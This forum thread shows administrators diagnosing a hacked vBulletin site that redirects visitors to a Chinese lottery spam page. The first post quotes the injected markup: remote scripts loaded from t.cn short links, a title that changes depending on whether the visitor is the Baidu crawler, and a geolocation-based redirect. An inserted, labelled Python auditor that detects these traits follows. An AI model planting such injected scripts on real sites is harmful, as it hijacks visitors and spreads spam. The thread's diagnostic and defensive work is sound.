Thread: AAAA website

  1. #1
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Posting this as a thread so we can try to assist with resolving.

    This link works: http://mohaaaa.co.uk/forums/forum.php
    However this link redirects you to some Chinese site: http://mohaaaa.co.uk/forums

    I'm looking at the source code right before the redirection takes place, and I see this:


    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script type="text/javascript" src="http://www.mohaaaa.co.uk/forums/dbtech/vbshout/clientscript/jquery.tmpl.min.js"></script>
    <script type="text/javascript" src="http://www.mohaaaa.co.uk/forums/dbtech/vbshout/clientscript/vbshout.js?v=624"></script>


    <script type="text/javascript">
    <!--

    // -->
    </script>


    <title>AAAA</title>
    <meta name="keywords" content="北京赛车游戏,北京赛车pk10,赛车游戏pk10开奖直播,北京pk10开奖记录">
    <meta name="description" content="北京赛车pk10天天中大奖注册地址【yxkj55.com】,北京赛车游戏、北京赛车pk10、赛车游戏pk10开奖直播、北京pk10开奖记录等赛车游戏pk10图表数据,为北京赛车游戏pk10彩民服务">
    <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="AAAA"}</script>
    <script language="javascript" src="http://t.cn/RFx7YHG"></script><script src="http://pv.sohu.com/cityjson?ie=utf-8" charset="GB2312"></script>

    <script>var sf=returnCitySN["cname"]; if(sf.indexOf("µطاّ")>=0){window.location.href="/indax.html";}</script>
    <script language="javascript" src="http://t.cn/RFx77Lk"></script></body>


    Definitely looks like the site is vulnerable to some cross-site scripting, or injection or something.
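Added example, not part of the original thread: a small Python audit of a served page for the three traits visible in the source quoted in post #1, namely scripts loaded from unexpected hosts, a title that changes depending on the visitor's user agent, and a client-side redirect. The allowlist of script hosts is an assumption drawn from the legitimate tags in that post, and the sample is constructed from lines quoted there with the garbled city string replaced by a placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only hosts this forum should load scripts from.
ALLOWED_HOSTS = {"ajax.googleapis.com", "mohaaaa.co.uk", "www.mohaaaa.co.uk"}
# Inline-script traits of the injected block: crawler cloaking, JS redirect.
INLINE = {
    "ua-cloaking": re.compile(r"navigator\.userAgent[^;]*indexOf\(", re.I),
    "js-redirect": re.compile(r"\blocation(\.href)?\s*=[^=]", re.I),
}

class ScriptAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._buf = [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._buf = []  # start collecting this script's inline text
        src = dict(attrs).get("src")
        host = urlparse(src).hostname if src else None
        if host and host not in ALLOWED_HOSTS:
            self.findings.append(("external-script", src))

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body, self._buf = "".join(self._buf), None
            for name, pattern in INLINE.items():
                if pattern.search(body):
                    self.findings.append((name, body.strip()[:60]))

def audit(html):
    """Return (kind, detail) findings for one HTML document."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: one legitimate tag plus three lines quoted in post #1.
SAMPLE = """
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="AAAA"}</script>
<script language="javascript" src="http://t.cn/RFx7YHG"></script>
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("PLACEHOLDER")>=0){window.location.href="/indax.html";}</script>
"""
```

Running `audit()` against a saved copy of each index page after cleanup, and again on a schedule, shows whether the injected tags have come back.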

  2. #2
    Developer RyBack's Avatar
    Join Date
    Apr 2014
    Location
    In Front of the screen
    Posts
    1,603

    Someone should code a new aaaa website with proper db system.

  3. #3
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    It could be an exploit in the software, or a lack of security patches on the hardware itself that allowed the JS injection.
    If I can get access to the FTP and admin CP of the site, I can take a look.

  4. #4

    Hi all, sorry, didn't know it had been hacked - they had replaced index in VBulletin

  5. #5
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    HSB, glad you got it resolved, but you seriously need to take a look at your hardware/software security.

  6. #6
    Client Beta Testers Appelpitje's Avatar
    Join Date
    Jan 2012
    Location
    Belgium
    Posts
    571

    I'm going to relaunch a vulnerability scan and let you know if there are any critical/high vulnerabilities on the server.

  7. #7

    The existing site and database can be secured (in different ways - if moved to a true linux server). Migrating it off the current Drupal version is next to impossible. VBulletin has several vulnerabilities. I HOPE I properly fixed a few of them on x-null, but I don't remember the details too much, but VBulletin is open to injection without one of the critical patches I made to x-null.

  8. #8

    I don't know if you guys already heard about Ghost:
    https://ghost.org/ (credit to Appelpitje who informed me about this nice publishing platform)
    https://github.com/TryGhost/Ghost
    I haven't tried but it looks promising and better than any other blog engine.

    There seems to be a module to import Drupal data into Ghost: https://github.com/mikebell/drupal-to-ghost

  9. #9
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Sorry to disappoint, but the issue is also on the root of the homepage. http://mohaaaa.co.uk

    And seems to have issues here too: http://www.mohaaaa.co.uk/AAAAMOHAA/c...-and-resources

    As far as migrating drupal 7 to vbulletin; this might be messy but what about migrating drupal to phpbb3 and then from phpbb3 to vbulletin?

  10. #10

    Originally Posted by James:
    Sorry to disappoint, but the issue is also on the root of the homepage. http://mohaaaa.co.uk

    And seems to have issues here too: http://www.mohaaaa.co.uk/AAAAMOHAA/c...-and-resources

    As far as migrating drupal 7 to vbulletin; this might be messy but what about migrating drupal to phpbb3 and then from phpbb3 to vbulletin?
    Ok thanks all - have found some other sub index, have protected them also as they also got hacked.
    Don't get chance these days to do much - basically the site is in two halves, VB for Forum and Database is Drupal - to be fair first hack on VB for very long time but yeh the Drupal side is weak and obsolete but also been a while since that has been hacked but myself and Own3mall spent a lot of time looking at what we could do and tried many things.

    For me the only way to do it is to rebuild on new platform via SQL workbench to export all the data in mysql to new solution. I had a go but beyond my skill set
